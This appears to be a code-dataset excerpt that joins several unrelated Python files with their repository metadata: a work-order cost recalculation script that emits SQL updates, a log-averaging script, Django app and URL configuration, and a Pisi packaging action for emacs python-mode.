opts, login_in_group_file = getopt.getopt(sys.argv[4], '-m')
print "login_in_group_file = %s" % login_in_group_file
opts, work_hour_file = getopt.getopt(sys.argv[5], '-m')
print "work_hour_file = %s" % work_hour_file
lookup_codes = {}
work_orders = make_data_dict(work_order_file)
#print "WORK ORDERS = %s" % work_orders
tasks = make_data_dict(task_file)
#print "TASKS = %s" % tasks
groups = make_data_dict(group_file)
#print "GROUPS = %s" % groups
login_in_groups = make_data_dict(login_in_group_file)
#print "LOGIN IN GROUPS = %s" % login_in_groups
work_hours = make_data_dict(work_hour_file)
#print "WORK HOURS = %s" % work_hours
work_order_codes = work_orders.keys()
task_codes = tasks.keys()
work_hour_codes = work_hours.keys()
out_lines = []
problem_lines = []
for woc in work_order_codes:
#Expected first
s_status = work_orders[woc]['s_status']
if s_status not in ['retired','r']:
work_group = work_orders[woc]['work_group']
estimated_work_hours = work_orders[woc]['estimated_work_hours']
if work_group not in [None,''] and estimated_work_hours not in [None,'',0,'0']:
estimated_work_hours = float(estimated_work_hours)
group_rate = groups[work_group]['hourly_rate']
if group_rate not in [None,'']:
group_rate = float(group_rate)
new_expected_cost = float(estimated_work_hours * group_rate)
out_lines.append("update work_order set expected_cost = '%s' where code = '%s';" % (new_expected_cost, woc))
else:
problem_lines.append("Work Order %s is incomplete. Work Group = %s, Est_WH = %s" % (woc, work_group, estimated_work_hours))
task_code = work_orders[woc]['task_code']
if task_code not in [None,'']:
summed_actual_cost = 0
if task_code in task_codes:
if tasks[task_code]['s_status'] not in ['retired','r']:
for whc in work_hour_codes:
if work_hours[whc]['task_code'] == task_code:
user = work_hours[whc]['login']
straight_time = work_hours[whc]['straight_time']
if straight_time not in [None,'',0,'0']:
straight_time = float(straight_time)
group_chosen = ''
group_rate = 0
for lg in login_in_groups.keys():
if login_in_groups[lg]['login'] == user:
if group_chosen == '':
group_chosen = login_in_groups[lg]['login_group']
if group_chosen in groups.keys():
group_rate = groups[group_chosen]['hourly_rate']
if group_rate not in [None,'',0,'0.0']:
group_rate = float(group_rate)
else:
group_rate = 0
else:
this_group = login_in_groups[lg]['login_group']
if this_group in groups.keys():
this_rate = groups[this_group]['hourly_rate']
if this_rate not in [None,'',0,'0.0']:
this_rate = float(this_rate)
else:
this_rate = 0
if this_rate > group_rate:
group_rate = this_rate
group_chosen = this_group
if group_rate not in [None,'']:
if group_rate == 0:
problem_lines.append("GROUP RATE WAS 0 for %s, user %s, group %s" % (whc, user, group_chosen))
else:
summed_actual_cost = summed_actual_cost + float(group_rate * straight_time)
if summed_actual_cost not in [None,'']:
out_lines.append("update work_order set actual_cost = '%s' where code = '%s';" % (summed_actual_cost, woc))
out_file = open('work_order_cost_fix','w')
for ol in out_lines:
out_file.write('%s\n' % ol)
out_file.close()
problem_file = open('work_order_cost_problems', 'w')
for pl in problem_lines:
problem_file.write('%s\n' % pl)
problem_file.close()
|
[
"topher.hughes@2gdigital.com"
] |
topher.hughes@2gdigital.com
|
dd789a1204e77259fb9bd8ee205a84343a7c5853
|
37624df48e42799c07e65760f38ca6b9d31bf9e5
|
/python/sensor/weights/hx711py/avg.py
|
51bbbaf1b6c8544e421e17a0ad721feb484e2f56
|
[
"Apache-2.0"
] |
permissive
|
DJ956/YoloBarcodeReader
|
f2ac330657430d1d1f9d02b9f1af76485b2afb13
|
148f387a8dce260a2dc54398702e20e0d6e6a7ac
|
refs/heads/master
| 2020-08-16T07:32:52.220478
| 2020-02-16T04:41:37
| 2020-02-16T04:41:37
| 215,473,285
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 236
|
py
|
with open("log.txt", "r") as f:
cnt = 1
line = f.readline()
sum = float(line)
while line:
print(line.strip())
sum = sum + float(line.strip())
line = f.readline()
cnt = cnt + 1
avg = sum / cnt
print("AVG:{}".format(avg))
|
[
"dexter13576@gmail.com"
] |
dexter13576@gmail.com
|
c5eccff0d3c5b636c09a0a75b58b010407af82e4
|
0e5b1f367fa867f16ef4bfb949e9139dd801030a
|
/notehub/apps.py
|
88f21271796aba9fb5ddad69dcba762e4b2541eb
|
[] |
no_license
|
polgodia/NoteHub
|
88b4493b74f48feadef7800a0bb9434eea4796b0
|
9dddef321267899b4e6989e1166b2728af9a4f29
|
refs/heads/master
| 2023-05-02T03:27:14.486998
| 2020-03-28T20:08:15
| 2020-03-28T20:08:15
| 245,120,301
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 86
|
py
|
from django.apps import AppConfig
class Django_App(AppConfig):
name = 'notehub'
|
[
"pgs8@alumnes.udl.cat"
] |
pgs8@alumnes.udl.cat
|
123f7dbef56d9142e08ed7b8ee92470e4423872f
|
ecc4e74a46f17120587a90cf63d6d29990865c3a
|
/Django_Level_Three/ProTwo/ProTwo/urls.py
|
0f227f7a243767cbb5d77a10555f69926a99c187
|
[] |
no_license
|
darthVader18/my_django
|
5b67d273b15ae5ce7f4dc6dec12a7ccf746a4604
|
5e682e31cd1e7d1c54d5e4b672f7e8a9b5b98695
|
refs/heads/master
| 2020-06-26T21:42:49.369120
| 2020-03-24T09:50:14
| 2020-03-24T09:50:14
| 199,699,737
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,028
|
py
|
"""ProTwo URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.conf.urls import url, include
from django.urls import path
from django.conf import settings
from appTwo import views
urlpatterns = [
path('', include('appTwo.urls')),
path('admin/', admin.site.urls),
]
if settings.DEBUG:
import debug_toolbar
urlpatterns = [
url(r'^__debug__/', include(debug_toolbar.urls))
] + urlpatterns
|
[
"50162503+darthVader18@users.noreply.github.com"
] |
50162503+darthVader18@users.noreply.github.com
|
a64456fc0046b8a42ad60ddaa19ba450e3c4bfac
|
4a7804ee05485c345b4e3c39a0c96ed4012542ac
|
/editor/emacs/emacs-python/actions.py
|
b0523c81855ca5f5c430977b55c02381e42c60ee
|
[] |
no_license
|
Erick-Pardus/Pardus
|
1fef143c117c62a40e3779c3d09f5fd49b5a6f5c
|
2693e89d53304a216a8822978e13f646dce9b1d3
|
refs/heads/master
| 2020-12-31T02:49:33.189799
| 2013-03-17T06:29:33
| 2013-03-17T06:29:33
| 17,247,989
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 363
|
py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Licensed under the GNU General Public License, version 3.
# See the file http://www.gnu.org/copyleft/gpl.txt.
from pisi.actionsapi import pisitools
from pisi.actionsapi import get
WorkDir = "python-mode.el-6.0.11"
def install():
pisitools.insinto("/usr/share/emacs/site-lisp/python", "*.el", "python-mode.el")
|
[
"namso-01@hotmail.it"
] |
namso-01@hotmail.it
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.